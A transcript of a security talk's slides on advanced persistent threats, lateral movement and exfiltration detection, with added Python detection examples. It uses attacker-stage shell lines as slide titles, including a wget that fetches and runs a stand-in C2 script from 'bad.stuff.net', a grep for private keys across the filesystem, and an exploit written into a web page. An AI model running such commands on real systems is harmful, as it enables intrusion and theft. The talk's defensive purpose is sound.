Advanced Threats and Lateral Movement Detection
TRANSCRIPT
Advanced Threats & Lateral Movement Detection
Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
Sr. Security Research Engineer, LogRhythm Labs
# whoami
• Greg Foss
• Sr. Security Researcher
• LogRhythm Labs – Threat Intel Team
• Former DOE Penetration Tester
• Focus => Honeypots, Incident Response, and Red Team
• OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…
# ls -lha
1. IT Security Threats
2. Event Correlation
3. Detection
4. DEMO!
# man [Advanced Threats]
• Advanced Persistent Threats
• Organized Cyber Crime
• Hacktivists
• ‘Cyber Terrorists’
• Etc…
• Able to develop and utilize sophisticated techniques in pursuit of their target objective, from reconnaissance to data exfiltration.
• Will leverage the full spectrum of attack vectors – social, technical, physical, etc.
• Highly organized, highly motivated, highly resourced.
• Willing to invest significant time and resources to compromise.
It’s when, not if…
• Mission Oriented
• Persistent and Driven
• Patient and Methodical
• Focus on exponential ROI
• Emphasis on high IP value targets
• They will get in…
Image: http://postfiles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg
Identify a ‘Hacker’
Ok, for real…
• *Simple… Correlate on odd network / host activity
• Use the data at hand to actively detect anomalies
• Understand how your organization will respond to a breach / outage / squirrel affecting any of the three InfoSec pillars
  • Confidentiality
  • Integrity
  • Availability
Advanced Threat Tactics and Evasion
• Threat actors of all types move slowly and quietly over time, limiting exposure and the potential for discovery.
• Trending on enterprise data over time helps to build baselines that can be used to actively identify anomalies.
IT Security Threats
# last && echo ‘How are they getting in??’
• Phishing
  • 91% of ‘advanced’ attacks began with a phishing email or similar social engineering tactics.
  • http://www.infosecurity-magazine.com/view/29562/91-of-apt-attacks-start-with-a-spearphishing-email/
• 2014 Metrics
  • Average cost per breach => $3.5 million
  • 15% higher than the previous year
  • http://www.ponemon.org/blog/ponemon-institute-releases-2014-cost-of-data-breach-global-analysis
# history | more
• It only takes one…
# ./searchsploit ‘client side’ && echo ‘new exploits daily!’
# cat [cve-2014-6332] >> /var/www/pwn-IE.html
Event Correlation & Detection
Defense in Depth
Spear Phishing
Phishing Attack Log Traces
$ vim next.sh
• Maintain Access…
Image: http://www.netresec.com/images/back_door_open_300x200.png
$ ./next.sh
• Then?
• *Nothing…
• For a long time… *not really*
• They have attained a foothold and are now your newest employees…
$ su - root
# wget http://bad.stuff.net/c2.py . && ./c2.py
• Once infected, the beachhead will beacon periodically
Behavioral Analytics
• Beaconing Activity – Usually initiated over port 443 or an encrypted tunnel over port 80.
  • Can be detected with a Firewall or Web Proxy
  • Capability to decrypt SSL traffic is a huge plus
• Behavioral analytics can be utilized to differentiate normal browsing activity from possible evidence of an infected host.
  • Using a SIEM, track the unique websites usually visited, and the overall volume of normal web activity, on a per user and a per host basis.
  • Watch for significant changes over an extended period of time.
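The per-host baseline idea above, as an added example that is not part of the talk: constructed proxy log lines are checked for a destination outside the host's usual sites that is contacted at nearly fixed intervals, which is what a periodic beacon looks like in a SIEM. The log format, host names and the `BASELINE` table are assumptions made for the example.

```python
# Added example (not the speaker's code): baseline-and-periodicity check over
# constructed web proxy log lines, one "<timestamp> <src_host> <dest_host> <bytes>" per line.
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SAMPLE_LOG = """\
2014-11-03T09:00:05 ws-17 intranet.example 4120
2014-11-03T09:00:05 ws-17 cdn.example 88210
2014-11-03T09:12:11 ws-17 news.example 45000
2014-11-03T09:00:00 ws-17 update.badhost.example 512
2014-11-03T09:05:00 ws-17 update.badhost.example 498
2014-11-03T09:10:01 ws-17 update.badhost.example 530
2014-11-03T09:15:00 ws-17 update.badhost.example 501
2014-11-03T09:20:00 ws-17 update.badhost.example 515
2014-11-03T09:03:44 ws-22 intranet.example 3900
2014-11-03T10:41:02 ws-22 news.example 61000
2014-11-03T14:07:30 ws-22 news.example 57000
"""

# Constructed baseline of sites each host normally visits (in practice built by the SIEM over weeks).
BASELINE = {"ws-17": {"intranet.example", "cdn.example", "news.example"},
            "ws-22": {"intranet.example", "news.example"}}

def parse_log(text):
    """Yield (timestamp, src_host, dest_host, bytes) tuples from the constructed log text."""
    for line in text.splitlines():
        ts, src, dst, nbytes = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(nbytes)

def find_beacons(text, baseline_sites, min_hits=4, max_cv=0.1):
    """Return {src_host: [dest_host, ...]} for destinations that look like beacons.

    A destination is flagged when the host contacts it at least min_hits times, it is
    not in that host's baseline, and the gaps between contacts are nearly constant
    (standard deviation / mean of the gaps <= max_cv).
    """
    times = defaultdict(list)
    for ts, src, dst, _ in parse_log(text):
        times[(src, dst)].append(ts)
    flagged = defaultdict(list)
    for (src, dst), stamps in times.items():
        if len(stamps) < min_hits or dst in baseline_sites.get(src, set()):
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_cv:
            flagged[src].append(dst)
    return dict(flagged)
```

Real beacons add jitter, so in production the interval tolerance (`max_cv`) is tuned per environment and combined with the volume trend the slide mentions rather than used alone.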
Reconnaissance
• Ping sweeps, service discovery, etc. – NO
• Why make unnecessary noise?
• Instead => access network shares, web apps, and services
• Passively gather information using available resources…
Image: http://macheads101.com/pages/pics/download_pics/mac/portscan.png
Lateral Movement
• Dump Local System Hashes
  • Maybe crack them, maybe it’s not even necessary…
• Pass the Hash (PtH)
• Dump plain text passwords
  • Mimikatz -- FTW!
• Act as an internal employee -- use legitimate means to access resources.
Uncovering Internal Reconnaissance and Pivoting
• Security Operations Goal => Reduce MTTD and MTTR
  • MTTD – Mean Time to Detect
  • MTTR – Mean Time to Respond
• Set Traps => Honeypot / Honey Token access
• Overt Clues => Modification of user / file / group permissions and pivoting evidence
• Subtle Clues => VPN access from disparate geographical locations
• Missed Opportunities => Once inside, they are now an ‘employee’…
Lateral Movement Log Traces
• Microsoft’s granular Event Identification schema (EVID), in conjunction with environment information, provides analysts with plenty of information to track attackers once they have breached the perimeter.
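One correlation over those event IDs, as an added example that is not from the talk: constructed Windows Security events (EVID 4624, successful logon; logon type 3 is a network logon) are grouped per account, and an account that reaches more than a handful of distinct hosts over the network inside a short window is raised as pivoting evidence. The simplified record layout, account and host names, and the thresholds are assumptions for the example.

```python
# Added example (not the speaker's code): fan-out correlation over constructed
# 4624 events. Record layout: (time, EVID, logon type, account, host logged on to, auth package).
from collections import defaultdict
from datetime import datetime, timedelta

EVENTS = [
    ("2014-11-03T10:00:00", 4624, 2, "alice",      "WS-17",    "Kerberos"),  # interactive logon
    ("2014-11-03T10:02:10", 4624, 3, "alice",      "FILESRV1", "Kerberos"),
    ("2014-11-03T13:15:00", 4624, 3, "alice",      "PRINT01",  "Kerberos"),
    ("2014-11-03T11:00:00", 4624, 3, "svc-backup", "WS-17",    "NTLM"),
    ("2014-11-03T11:00:30", 4624, 3, "svc-backup", "WS-22",    "NTLM"),
    ("2014-11-03T11:01:05", 4624, 3, "svc-backup", "WS-22",    "NTLM"),
    ("2014-11-03T11:01:40", 4624, 3, "svc-backup", "FILESRV1", "NTLM"),
    ("2014-11-03T11:02:15", 4624, 3, "svc-backup", "DC01",     "NTLM"),
    ("2014-11-03T11:02:50", 4624, 3, "svc-backup", "EXCH01",   "NTLM"),
]

def network_logons(events):
    """Keep only successful network logons: EVID 4624 with logon type 3."""
    return [(datetime.fromisoformat(t), acct, host, pkg)
            for t, evid, ltype, acct, host, pkg in events
            if evid == 4624 and ltype == 3]

def detect_fan_out(events, window=timedelta(minutes=10), max_hosts=3):
    """Return {account: sorted hosts} for accounts that logged on to more than
    max_hosts distinct hosts over the network within any window-long span."""
    by_acct = defaultdict(list)
    for ts, acct, host, _ in network_logons(events):
        by_acct[acct].append((ts, host))
    alerts = {}
    for acct, logons in by_acct.items():
        logons.sort()  # chronological, so each start index opens one candidate window
        for i, (start, _) in enumerate(logons):
            hosts = {h for ts, h in logons[i:] if ts - start <= window}
            if len(hosts) > max_hosts:
                alerts[acct] = sorted(hosts)
                break
    return alerts
```

The authentication package is carried along because the same records support a second, separate check on accounts that normally authenticate with Kerberos suddenly appearing with NTLM network logons.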
Passive Data Extraction
• Well Poisoning via UNC Paths
• SMB Replay
• Help Desk Tickets
• Responder – By Spider Labs
• Keylogging
Passive Traffic Analysis
• Analyze / capture anything that comes across the wire.
• ARP poison hosts of interest, take over switches/routers, etc.
Image: https://i.chzbgr.com/maxW500/5579525376/h7D009AE4/
# grep -rhi ‘private key’ /* && echo “Identify Key Resources”
• Keys / Certificates / Passwords
• File Shares and Databases
• Intellectual Property
• Domain Controllers / Exchange / etc.
• Business Leaders – CXO, Director, VP, etc.
• Administrative Assistants
Image: http://www.mobilemarketingwatch.com/wordpress/wp-content/uploads/2011/07/Top-Secret-Tip-To-Pick-SMS-Keyword.jpeg
# wget http://target/files.tgz && echo “Data Exfiltration”
• Target data identified, gathered, and moved out of the environment.
• Data is normally leaked in a ‘hidden’ or modified format; rarely is the actual document extracted.
• Emails and Employee PII
• Intellectual Property
• Trade Secrets
Image: http://www.csee.umbc.edu/wp-content/uploads/2013/04/ex.jpg
Data Exfiltration is Often Not ‘Advanced’
Catching Data Exfiltration
• Granular restrictions on sensitive files and directories to specific groups or individuals; alert on any abnormal file access / read / write / etc.
• DNS exfiltration, or sometimes even ICMP tunneling in high security environments
• Non-SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
• Abnormal web server activity, newly created files, etc.
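Two of the checks listed above, as an added example that is not from the talk: a flow on 443/8443 whose first bytes are not a TLS handshake record header, and a DNS query name whose subdomain part is unusually long or high-entropy, as encoded data tunnelled over DNS tends to be. The flow records, query names and thresholds are constructed for the example.

```python
# Added example (not the speaker's code): protocol-mismatch and DNS-name checks
# over constructed records.
import math
from collections import Counter

# Constructed flows: (destination port, first bytes of the client payload).
FLOWS = [
    (443,  bytes.fromhex("160301")),                 # TLS handshake record header
    (443,  b"GET / HTTP/1.1\r\nHost: x\r\n"),         # plain HTTP on 443
    (8443, b"\x16\x03\x03\x00\x9c"),                  # TLS 1.2 record header
    (8443, b"\x00\x01\x02\x03\x04\x05\x06\x07"),       # unidentified binary on 8443
    (80,   b"GET / HTTP/1.1\r\n"),                    # ordinary HTTP
]
# Constructed DNS queries; the last one carries hex-encoded data in its first label.
QUERIES = [
    "www.example.com",
    "mail.corp.example.net",
    "4a6f686e5f646f655f73736e3a3132332d34352d36373839.t.badhost.example",
]

def looks_like_tls(payload):
    """True if the bytes start with a TLS record of type handshake (0x16) and version 3.0-3.3."""
    return len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03 and payload[2] <= 0x03

def non_tls_on_tls_ports(flows, tls_ports=(443, 8443)):
    """Return flows on TLS ports whose payload does not begin with a TLS record."""
    return [f for f in flows if f[0] in tls_ports and not looks_like_tls(f[1])]

def shannon_entropy(s):
    """Bits of entropy per character of the string s."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def suspicious_dns(names, max_label=30, min_entropy=3.5):
    """Flag names whose part left of the registered domain has an over-long label or high entropy."""
    hits = []
    for name in names:
        labels = name.lower().split(".")
        sub_labels = labels[:-2]  # assumes a two-label registered domain, e.g. example.com
        if not sub_labels:
            continue
        sub = ".".join(sub_labels)
        if max(len(lab) for lab in sub_labels) > max_label or shannon_entropy(sub) > min_entropy:
            hits.append(name)
    return hits
```

Both checks are first-pass filters; a CDN with long hashed hostnames will trip the DNS heuristic, so the hits are meant to feed the correlation the next slide calls for, not to alert on their own.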
It all comes down to Event Correlation
DEMO
Closing Thoughts…
• Don’t be hard on the outside, soft and chewy on the inside…
• Implement Layer 3 (network) Segmentation and Least User Privilege
• Understand your environment and log data so that you can accurately correlate physical and cyber events
• Implement URL filtering, stateful packet inspection, and binary analysis
• Actively alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
• The earlier you can detect attackers the better…
Thank You!
QUESTIONS?
Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
Senior Security Research Engineer
Greg.Foss[at]logrhythm.com
@heinzarelli